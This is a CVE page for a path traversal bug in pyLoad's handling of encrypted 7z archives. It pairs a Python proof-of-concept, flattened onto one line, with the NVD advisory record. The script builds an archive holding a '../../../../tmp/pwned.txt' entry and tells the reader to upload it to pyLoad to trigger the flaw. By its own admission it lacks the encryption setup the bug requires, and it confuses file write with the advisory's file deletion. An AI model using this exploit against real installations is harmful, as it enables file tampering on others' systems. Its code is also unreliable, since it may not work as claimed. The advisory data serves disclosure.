CVE-2026-32808

import os import py7zr # Requires py7zr library: pip install py7zr # Proof of Concept for CVE-2026-32808 # Description: Creates a 7z archive with a file name containing path traversal sequences. # Note: Real exploitation requires specific 7z flags (encrypt content but not headers) which may # not be directly supported by high-level libraries like py7zr for creation. # This script demonstrates the logic of preparing a malicious file structure. def create_poc(): # The malicious file name intended to escape the extraction directory # Targeting a file outside the web root or system directory traversal_filename = "../../../../tmp/pwned.txt" # Create a dummy file to be archived with open(traversal_filename, "w") as f: f.write("This file demonstrates arbitrary file deletion/write.") # Create the archive with py7zr.SevenZipFile("malicious_poc.7z", "w") as archive: # Archives the file. If pyLoad processes this, it might resolve to /tmp/pwned.txt archive.write(traversal_filename, traversal_filename) print(f"Created malicious_poc.7z with file: {traversal_filename}") print("Upload this file to pyLoad to trigger the vulnerability.") # Cleanup local dummy file if os.path.exists(traversal_filename): os.remove(traversal_filename) if __name__ == "__main__": create_poc()

{"cve": {"id": "CVE-2026-32808", "sourceIdentifier": "[email protected]", "published": "2026-03-20T02:16:34.683", "lastModified": "2026-03-26T18:36:48.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyLoad is a free and open-source download manager written in Python. Versions before 0.5.0b3.dev97 are vulnerable to path traversal during password verification of certain encrypted 7z archives (encrypted files with non-encrypted headers), causing arbitrary file deletion outside of the extraction directory. During password verification, pyLoad derives an archive entry name from 7z listing output and treats it as a filesystem path without constraining it to the extraction directory. This issue has been fixed in version 0.5.0b3.dev97."}, {"lang": "es", "value": "pyLoad es un gestor de descargas gratuito y de código abierto escrito en Python. Las versiones anteriores a 0.5.0b3.dev97 son vulnerables a salto de ruta durante la verificación de contraseña de ciertos archivos 7z cifrados (archivos cifrados con encabezados no cifrados), causando la eliminación arbitraria de archivos fuera del directorio de extracción. Durante la verificación de contraseña, pyLoad deriva un nombre de entrada de archivo de la salida de listado de 7z y lo trata como una ruta del sistema de archivos sin restringirlo al directorio de extracción. Este problema ha sido corregido en la versión 0.5.0b3.dev97."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.4.20", "matchCriteriaId": "DACFA9B5-22AD-4BC6-87D5-8272FF49BD56"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:*", "versionStartIncluding": "0.5.0a5.dev528", "versionEndExcluding": "0.5.0b3.dev97", "matchCriteriaId": "FCF4830F-E848-4F80-AB82-2040E219E677"}]}]}], "references": [{"url": "https://github.com/pyload/pyload/security/advisories/GHSA-7g4m-8hx2-4qh3", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}